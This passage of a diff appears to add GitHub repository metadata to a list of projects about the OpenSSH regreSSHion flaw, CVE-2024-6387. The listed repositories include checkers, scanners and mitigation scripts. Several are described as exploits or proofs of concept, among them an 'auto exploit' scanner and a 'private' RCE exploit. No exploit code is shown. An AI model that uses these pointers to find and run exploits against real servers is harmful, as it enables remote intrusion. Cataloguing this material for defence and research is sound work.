"subscribers_count": 1 + }, + { + "id": 823031972, + "name": "CVE-2024-6387-Updated-x64bit", + "full_name": "PrincipalAnthony\/CVE-2024-6387-Updated-x64bit", + "owner": { + "login": "PrincipalAnthony", + "id": 174432334, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/174432334?v=4", + "html_url": "https:\/\/github.com\/PrincipalAnthony", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PrincipalAnthony\/CVE-2024-6387-Updated-x64bit", + "description": "Private x64 RCE exploit for CVE-2024-6387 [02.07.2024] from exploit.in", + "fork": false, + "created_at": "2024-07-02T09:45:04Z", + "updated_at": "2024-07-02T15:52:27Z", + "pushed_at": "2024-07-02T09:46:08Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823040737, + "name": "CVE-2024-6387-POC", + "full_name": "skyalliance\/CVE-2024-6387-POC", + "owner": { + "login": "skyalliance", + "id": 127739423, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127739423?v=4", + "html_url": "https:\/\/github.com\/skyalliance", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skyalliance\/CVE-2024-6387-POC", + "description": null, + "fork": false, + "created_at": "2024-07-02T10:05:43Z", + "updated_at": "2024-07-02T13:24:40Z", + "pushed_at": "2024-07-02T13:24:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823053102, + "name": "CVE-2024-6387-Mitigation-Ansible-Playbook", + "full_name": "daniel-odrinski\/CVE-2024-6387-Mitigation-Ansible-Playbook", + "owner": { + "login": "daniel-odrinski", + "id": 22768251, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22768251?v=4", + "html_url": "https:\/\/github.com\/daniel-odrinski", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/daniel-odrinski\/CVE-2024-6387-Mitigation-Ansible-Playbook", + "description": "An Ansible Playbook to mitigate the risk of RCE (CVE-2024-6387) until platforms update OpenSSH to a non-vulnerable version.", + "fork": false, + "created_at": "2024-07-02T10:34:17Z", + "updated_at": "2024-07-02T11:05:58Z", + "pushed_at": "2024-07-02T11:05:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823065840, + "name": "openssh-cve-2024-6387.sh", + "full_name": "rumochnaya\/openssh-cve-2024-6387.sh", + "owner": { + "login": "rumochnaya", + "id": 8115717, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8115717?v=4", + "html_url": "https:\/\/github.com\/rumochnaya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rumochnaya\/openssh-cve-2024-6387.sh", + "description": "openssh-cve-2024-6387.sh", + "fork": false, + "created_at": "2024-07-02T11:05:07Z", + "updated_at": "2024-07-04T11:27:01Z", + "pushed_at": "2024-07-02T11:23:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823067387, + "name": "CVE-2024-6387-Mitigation", + "full_name": "zenzue\/CVE-2024-6387-Mitigation", + "owner": { + "login": "zenzue", + "id": 19271340, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19271340?v=4", + "html_url": "https:\/\/github.com\/zenzue", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zenzue\/CVE-2024-6387-Mitigation", + "description": "Mitigation Guide for CVE-2024-6387 in OpenSSH", + "fork": false, + "created_at": "2024-07-02T11:08:40Z", + "updated_at": "2024-07-02T11:17:15Z", + "pushed_at": "2024-07-02T11:17:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823086763, + "name": "CVE-2024-6387-Check", + "full_name": "devarshishimpi\/CVE-2024-6387-Check", + "owner": { + "login": "devarshishimpi", + "id": 43378923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43378923?v=4", + "html_url": "https:\/\/github.com\/devarshishimpi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/devarshishimpi\/CVE-2024-6387-Check", + "description": "CVE-2024-6387 Checker is a fast, efficient tool for detecting OpenSSH servers vulnerable to the regreSSHion exploit. It quickly scans multiple IPs, domain names, and CIDR ranges to identify risks and help secure your infrastructure.", + "fork": false, + "created_at": "2024-07-02T11:55:39Z", + "updated_at": "2024-09-16T07:16:49Z", + "pushed_at": "2024-07-08T20:39:03Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bash", + "cve-2024-6387", + "cve-2024-6387-checker", + "devarshishimpi", + "openssh", + "openssh-client", + "openssh-server", + "openssh-sftp-server", + "regresshion", + "ssh", + "vulnerability-detection", + "vulnerability-scanners" + ], + "visibility": "public", + "forks": 3, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 823099379, + "name": "cve-2024-6387_AImade", + "full_name": "hssmo\/cve-2024-6387_AImade", + "owner": { + "login": "hssmo", + "id": 99412060, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99412060?v=4", + "html_url": "https:\/\/github.com\/hssmo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hssmo\/cve-2024-6387_AImade", + "description": "cve-2024-6387_AImade", + "fork": false, + "created_at": "2024-07-02T12:24:25Z", + "updated_at": "2024-07-02T12:34:36Z", + "pushed_at": "2024-07-02T12:34:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823109994, + "name": "checker-CVE-2024-6387", + "full_name": "ACHUX21\/checker-CVE-2024-6387", + "owner": { + "login": "ACHUX21", + "id": 130113878, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130113878?v=4", + "html_url": "https:\/\/github.com\/ACHUX21", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ACHUX21\/checker-CVE-2024-6387", + "description": null, + "fork": false, + "created_at": "2024-07-02T12:48:27Z", + "updated_at": "2024-07-19T10:54:54Z", + "pushed_at": "2024-07-02T13:18:38Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823118069, + "name": "ssh_exploiter_CVE-2024-6387", + "full_name": "AiGptCode\/ssh_exploiter_CVE-2024-6387", + "owner": { + "login": "AiGptCode", + "id": 146197697, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146197697?v=4", + "html_url": "https:\/\/github.com\/AiGptCode", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AiGptCode\/ssh_exploiter_CVE-2024-6387", + "description": "CVE-2024-6387 with auto ip scanner and auto expliot ", + "fork": false, + "created_at": "2024-07-02T12:57:35Z", + "updated_at": "2024-11-19T22:52:23Z", + "pushed_at": "2024-07-04T01:55:26Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "android", + "cve", + "cve-2024-6387", + "exploit", + "ftp", + "hack", + "hacktoberfest", + "kali", + "kali-linux", + "linux", + "openssh", + "python", + "python3", + "root", + "shell", + "ssh", + "windows" + ], + "visibility": "public", + "forks": 2, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823151186, + "name": "regreSSHion-nmap-scanner", + "full_name": "xristos8574\/regreSSHion-nmap-scanner", + "owner": { + "login": "xristos8574", + "id": 48923762, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48923762?v=4", + "html_url": "https:\/\/github.com\/xristos8574", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xristos8574\/regreSSHion-nmap-scanner", + "description": "A bash script for nmap to scan for vulnerable machines in regards to the latest CVE-2024-6387", + "fork": false, + "created_at": "2024-07-02T13:50:47Z", + "updated_at": "2024-07-02T13:52:27Z", + "pushed_at": "2024-07-02T13:52:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823184811, + "name": "regreSSHion", + "full_name": "xonoxitron\/regreSSHion", + "owner": { + "login": "xonoxitron", + "id": 7057784, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7057784?v=4", + "html_url": "https:\/\/github.com\/xonoxitron", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xonoxitron\/regreSSHion", + "description": "CVE-2024-6387 (regreSSHion) Exploit (PoC), a vulnerability in OpenSSH's server (sshd) on glibc-based Linux systems.", + "fork": false, + "created_at": "2024-07-02T14:41:43Z", + "updated_at": "2024-11-21T05:20:40Z", + "pushed_at": "2024-07-02T15:16:04Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "c", + "cve-2024-6387", + "exploit", + "glibc", + "linux", + "openssh", + "poc", + "regresshion", + "sshd" + ], + "visibility": "public", + "forks": 8, + "watchers": 29, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 823199757, + "name": "CVE-2024-6387", + "full_name": "no-one-sec\/CVE-2024-6387", + "owner": { + "login": "no-one-sec", + "id": 118190089, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118190089?v=4", + "html_url": "https:\/\/github.com\/no-one-sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/no-one-sec\/CVE-2024-6387", + "description": "开箱即用的AK47", + "fork": false, + "created_at": "2024-07-02T15:13:09Z", + "updated_at": "2024-07-02T15:14:52Z", + "pushed_at": "2024-07-02T15:13:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823199952, + "name": "CVE-2024-6387", + "full_name": "dawnl3ss\/CVE-2024-6387", + "owner": { + "login": "dawnl3ss", + "id": 52249849, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52249849?v=4", + "html_url": "https:\/\/github.com\/dawnl3ss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dawnl3ss\/CVE-2024-6387", + "description": null, + "fork": false, + "created_at": "2024-07-02T15:13:33Z", + "updated_at": "2024-07-02T15:14:40Z", + "pushed_at": "2024-07-02T15:14:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823236084, + "name": "CVE-2024-6387-Exploit-POC", + "full_name": "MrR0b0t19\/CVE-2024-6387-Exploit-POC", + "owner": { + "login": "MrR0b0t19", + "id": 63489501, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63489501?v=4", + "html_url": "https:\/\/github.com\/MrR0b0t19", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MrR0b0t19\/CVE-2024-6387-Exploit-POC", + "description": null, + "fork": false, + "created_at": "2024-07-02T16:34:12Z", + "updated_at": "2024-07-14T06:25:24Z", + "pushed_at": "2024-07-02T16:38:33Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823250035, + "name": "CVE-2024-6387", + "full_name": "th3gokul\/CVE-2024-6387", + "owner": { + "login": "th3gokul", + "id": 89386101, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89386101?v=4", + "html_url": "https:\/\/github.com\/th3gokul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/th3gokul\/CVE-2024-6387", + "description": "CVE-2024-6387 : Vulnerability Detection tool for regreSSHion Remote Unauthenticated Code Execution in OpenSSH Server", + "fork": false, + "created_at": "2024-07-02T17:04:52Z", + "updated_at": "2024-10-20T09:56:28Z", + "pushed_at": "2024-07-02T17:47:29Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823284825, + "name": "Test_CVE-2024-6387", + "full_name": "n1cks0n\/Test_CVE-2024-6387", + "owner": { + "login": "n1cks0n", + "id": 100887222, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100887222?v=4", + "html_url": "https:\/\/github.com\/n1cks0n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n1cks0n\/Test_CVE-2024-6387", + "description": "Test_CVE-2024-6387 is a lightweight, efficient tool designed to identify servers running vulnerable versions of OpenSSH", + "fork": false, + "created_at": "2024-07-02T18:30:28Z", + "updated_at": "2024-07-02T18:31:58Z", + "pushed_at": "2024-07-02T18:31:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823285710, + "name": "CVE-2024-6387", + "full_name": "l0n3m4n\/CVE-2024-6387", + "owner": { + "login": "l0n3m4n", + "id": 143868630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143868630?v=4", + "html_url": "https:\/\/github.com\/l0n3m4n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/l0n3m4n\/CVE-2024-6387", + "description": "PoC - Remote Unauthenticated Code Execution Vulnerability in OpenSSH server (Scanner and Exploit) ", + "fork": false, + "created_at": "2024-07-02T18:32:46Z", + "updated_at": "2024-11-24T05:59:37Z", + "pushed_at": "2024-07-05T15:19:28Z", + "stargazers_count": 64, + "watchers_count": 64, + "has_discussions": false, + "forks_count": 27, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-6387", + "exploit", + "openssh-server", + "payload", + "poc", + "python3", + "rce" + ], + "visibility": "public", + "forks": 27, + "watchers": 64, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823291064, + "name": "CVE-2024-6387-Checker", + "full_name": "RickGeex\/CVE-2024-6387-Checker", + "owner": { + "login": "RickGeex", + "id": 7975904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7975904?v=4", + "html_url": "https:\/\/github.com\/RickGeex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RickGeex\/CVE-2024-6387-Checker", + "description": "CVE-2024-6387-Check is a streamlined and efficient tool created to detect servers operating on vulnerable versions of OpenSSH.", + "fork": false, + "created_at": "2024-07-02T18:46:24Z", + "updated_at": "2024-07-02T20:32:50Z", + "pushed_at": "2024-07-02T20:32:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823296113, + "name": "regreSSHion-checker", + "full_name": "xonoxitron\/regreSSHion-checker", + "owner": { + "login": "xonoxitron", + "id": 7057784, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7057784?v=4", + "html_url": "https:\/\/github.com\/xonoxitron", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xonoxitron\/regreSSHion-checker", + "description": "Quickly identifies servers vulnerable to OpenSSH 'regreSSHion' (CVE-2024-6387).", + "fork": false, + "created_at": "2024-07-02T18:59:54Z", + "updated_at": "2024-11-20T01:42:09Z", + "pushed_at": "2024-07-02T19:06:01Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-6387", + "glibc", + "golang", + "linux", + "openssh", + "regresshion", + "sshd" + ], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823323116, + "name": "cve-2024-6387-nuclei-template", + "full_name": "BrandonLynch2402\/cve-2024-6387-nuclei-template", + "owner": { + "login": "BrandonLynch2402", + "id": 19439875, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19439875?v=4", + "html_url": "https:\/\/github.com\/BrandonLynch2402", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BrandonLynch2402\/cve-2024-6387-nuclei-template", + "description": null, + "fork": false, + "created_at": "2024-07-02T20:19:12Z", + "updated_at": "2024-07-31T06:59:36Z", + "pushed_at": "2024-07-02T20:28:35Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823328220, + "name": "CVE-2024-6387_Check", + "full_name": "edsonjt81\/CVE-2024-6387_Check", + "owner": { + "login": "edsonjt81", + "id": 27496739, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27496739?v=4", + "html_url": "https:\/\/github.com\/edsonjt81", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/edsonjt81\/CVE-2024-6387_Check", + "description": null, + "fork": false, + "created_at": "2024-07-02T20:35:53Z", + "updated_at": "2024-07-02T20:38:08Z", + "pushed_at": "2024-07-02T20:38:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823340268, + "name": "CVE-2024-6387", + "full_name": "grupooruss\/CVE-2024-6387", + "owner": { + "login": "grupooruss", + "id": 43943489, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43943489?v=4", + "html_url": "https:\/\/github.com\/grupooruss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/grupooruss\/CVE-2024-6387", + "description": "regreSSHion vulnerability in OpenSSH CVE-2024-6387 Testing Script", + "fork": false, + "created_at": "2024-07-02T21:16:45Z", + "updated_at": "2024-07-08T23:58:50Z", + "pushed_at": "2024-07-02T21:30:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 823349523, + "name": "CVE-2024-6387-Checker", + "full_name": "CognisysGroup\/CVE-2024-6387-Checker", + "owner": { + "login": "CognisysGroup", + "id": 101755095, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101755095?v=4", + "html_url": "https:\/\/github.com\/CognisysGroup", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CognisysGroup\/CVE-2024-6387-Checker", + "description": null, + "fork": false, + "created_at": "2024-07-02T21:47:02Z", + "updated_at": "2024-07-03T12:15:46Z", + "pushed_at": "2024-07-03T12:13:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823487291, + "name": "CVE-2024-6387", + "full_name": "sxlmnwb\/CVE-2024-6387", + "owner": { + "login": "sxlmnwb", + "id": 65052912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65052912?v=4", + "html_url": "https:\/\/github.com\/sxlmnwb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sxlmnwb\/CVE-2024-6387", + "description": "Targeting a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems.", + "fork": false, + "created_at": "2024-07-03T06:08:32Z", + "updated_at": "2024-11-21T06:28:18Z", + "pushed_at": "2024-07-03T06:47:46Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-6387" + ], + "visibility": "public", + "forks": 5, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823542110, + "name": "CVE-2024-6387", + "full_name": "Symbolexe\/CVE-2024-6387", + "owner": { + "login": "Symbolexe", + "id": 140549630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140549630?v=4", + "html_url": "https:\/\/github.com\/Symbolexe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Symbolexe\/CVE-2024-6387", + "description": "SSH Exploit for CVE-2024-6387 : RCE in OpenSSH's server, on glibc-based Linux systems", + "fork": false, + "created_at": "2024-07-03T08:22:57Z", + "updated_at": "2024-08-20T21:05:45Z", + "pushed_at": "2024-07-04T15:07:21Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-6387", + "exploit", + "pentesting", + "python3", + "redteam" + ], + "visibility": "public", + "forks": 5, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823593765, + "name": "sentinelssh", + "full_name": "harshinsecurity\/sentinelssh", + "owner": { + "login": "harshinsecurity", + "id": 51978908, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51978908?v=4", + "html_url": "https:\/\/github.com\/harshinsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/harshinsecurity\/sentinelssh", + "description": "SentinelSSH is an advanced, high-performance SSH vulnerability scanner written in Go. It's specifically designed to detect the CVE-2024-6387 vulnerability in OpenSSH servers across various network environments.", + "fork": false, + "created_at": "2024-07-03T10:26:23Z", + "updated_at": "2024-09-07T05:01:32Z", + "pushed_at": "2024-07-08T07:32:32Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-6387", + "exploit", + "openssh", + "ssh" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823665546, + "name": "cve-2024-6387-poc", + "full_name": "t3rry327\/cve-2024-6387-poc", + "owner": { + "login": "t3rry327", + "id": 65151897, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65151897?v=4", + "html_url": "https:\/\/github.com\/t3rry327", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/t3rry327\/cve-2024-6387-poc", + "description": null, + "fork": false, + "created_at": "2024-07-03T13:21:10Z", + "updated_at": "2024-07-03T13:25:02Z", + "pushed_at": "2024-07-03T13:24:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823735743, + "name": "CVE-2024-6387_poc", + "full_name": "jocker2410\/CVE-2024-6387_poc", + "owner": { + "login": "jocker2410", + "id": 22291909, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22291909?v=4", + "html_url": "https:\/\/github.com\/jocker2410", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jocker2410\/CVE-2024-6387_poc", + "description": null, + "fork": false, + "created_at": "2024-07-03T15:51:16Z", + "updated_at": "2024-08-04T10:50:56Z", + "pushed_at": "2024-08-04T10:50:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823899223, + "name": "sshd-logingracetime0", + "full_name": "liqhtnd\/sshd-logingracetime0", + "owner": { + "login": "liqhtnd", + "id": 88907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88907425?v=4", + "html_url": "https:\/\/github.com\/liqhtnd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/liqhtnd\/sshd-logingracetime0", + "description": "Script to address CVE-2024-6387 by changing the LoginGraceTime in sshd.", + "fork": false, + "created_at": "2024-07-04T01:02:34Z", + "updated_at": "2024-07-13T18:45:36Z", + "pushed_at": "2024-07-13T18:43:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823939765, + "name": "ssh-CVE-2024-6387-poc", + "full_name": "JackSparrowhk\/ssh-CVE-2024-6387-poc", + "owner": { + "login": "JackSparrowhk", + "id": 108756180, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108756180?v=4", + "html_url": "https:\/\/github.com\/JackSparrowhk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JackSparrowhk\/ssh-CVE-2024-6387-poc", + "description": "CVE-2024-6387_Check 是一款轻量级、高效的工具,旨在识别运行易受攻击的 OpenSSH 版本的服务器,专门针对最近发现的regreSSHion漏洞 (CVE-2024-6387)。此脚本有助于快速扫描多个 IP 地址、域名和 CIDR 网络范围,以检测潜在漏洞并确保您的基础设施安全。", + "fork": false, + "created_at": "2024-07-04T03:51:16Z", + "updated_at": "2024-07-04T03:51:16Z", + "pushed_at": "2024-07-04T03:51:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823940931, + "name": "CVE-2024-6387-OpenSSH-Vulnerability-Checker", + "full_name": "turbobit\/CVE-2024-6387-OpenSSH-Vulnerability-Checker", + "owner": { + "login": "turbobit", + "id": 11604783, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11604783?v=4", + "html_url": "https:\/\/github.com\/turbobit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/turbobit\/CVE-2024-6387-OpenSSH-Vulnerability-Checker", + "description": "Welcome to the CVE-2024-6387 OpenSSH Vulnerability Checker repository! This project offers multiple scripts to check the installed version of OpenSSH on your system and determine if it is vulnerable to CVE-2024-6387. It supports various environments, including Ubuntu, Mac, and Windows.", + "fork": false, + "created_at": "2024-07-04T03:56:08Z", + "updated_at": "2024-07-07T21:11:55Z", + "pushed_at": "2024-07-04T05:13:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-6387-checker" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823979710, + "name": "CVE-2024-6387", + "full_name": "sms2056\/CVE-2024-6387", + "owner": { + "login": "sms2056", + "id": 15358350, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15358350?v=4", + "html_url": "https:\/\/github.com\/sms2056", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sms2056\/CVE-2024-6387", + "description": null, + "fork": false, + "created_at": "2024-07-04T06:10:56Z", + "updated_at": "2024-07-04T06:16:22Z", + "pushed_at": "2024-07-04T06:16:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824151224, + "name": "regreSSHion-CVE-2024-6387-", + "full_name": "invaderslabs\/regreSSHion-CVE-2024-6387-", + "owner": { + "login": 